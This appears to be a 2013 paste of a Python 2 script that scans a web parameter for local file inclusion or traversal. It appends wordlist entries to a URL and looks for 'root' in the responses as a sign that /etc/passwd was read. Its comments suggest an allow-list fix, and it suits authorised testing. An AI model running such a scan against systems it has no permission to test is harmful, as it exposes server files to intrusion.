
webscan module - try LFI

a guest Mar 20th, 2013 174 Never
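#!/usr/bin/env python
# ----
# try_lfi.py - simple check for a local file inclusion (LFI) vulnerability
# ----
# - can be also used to find traversal-vulnerabilities
# - tests can be extended to find more information than just passwd file.
# more @ http://hauntit.blogspot.com
#
# Python 2 script (print statements, urllib.urlopen).
# How it works: every line of LFItext.txt is appended to the URL given on the
# command line, the resulting page is fetched, and each response line that
# contains the string 'root' is reported. One GET request is sent per
# wordlist entry.
#
# Reading the result: a confirmed hit means the tested parameter reaches a
# file open/include call without filtering. The usual server-side fix is to
# map the parameter onto an allow-list of known files instead of using it as
# a path.

import urllib
import sys

# Check the argument count before reading sys.argv[1]; indexing first raises
# IndexError on a bare invocation and the usage text is never printed.
if len(sys.argv) < 2:
    sys.stderr.write('usage: '+sys.argv[0]+' http://localhost/page?param=')
    sys.exit(1)

#defines:
url = sys.argv[1]

# The wordlist is opened only after the arguments are known to be valid, and
# the with-block closes the handle once the lines are in memory.
with open('LFItext.txt', 'r') as checkLfis:
    try_lfi = checkLfis.readlines()

print '---------------------------------------------------------------'
print '[+] Searching for traversal/LFI vulnerability at URL: ', url
print '---------------------------------------------------------------'

for line in try_lfi:
    # Each entry keeps the trailing newline that readlines() leaves on it.
    full_url_to_check = url+line
    try_page = urllib.urlopen(full_url_to_check)
    try:
        read_page = try_page.readlines()
        status = try_page.getcode()
    finally:
        # Release the connection even if reading the body fails.
        try_page.close()

    print 'Trying: ',line
    print 'Status: ', status
    print '\t[~] Now reading the answer to find out if there is our \'vulnerable-string\'...'

    for read_lines in read_page:
        # NOTE(review): a bare substring match on 'root' also fires on any
        # page that merely mentions the word, so every hit is a lead to
        # confirm by hand, not proof that a file was included.
        if read_lines.find('root') != -1:
            print '\t[+] Found potential LFI bug! This is the answer: ', read_lines
print '---------------------------------------------------------------'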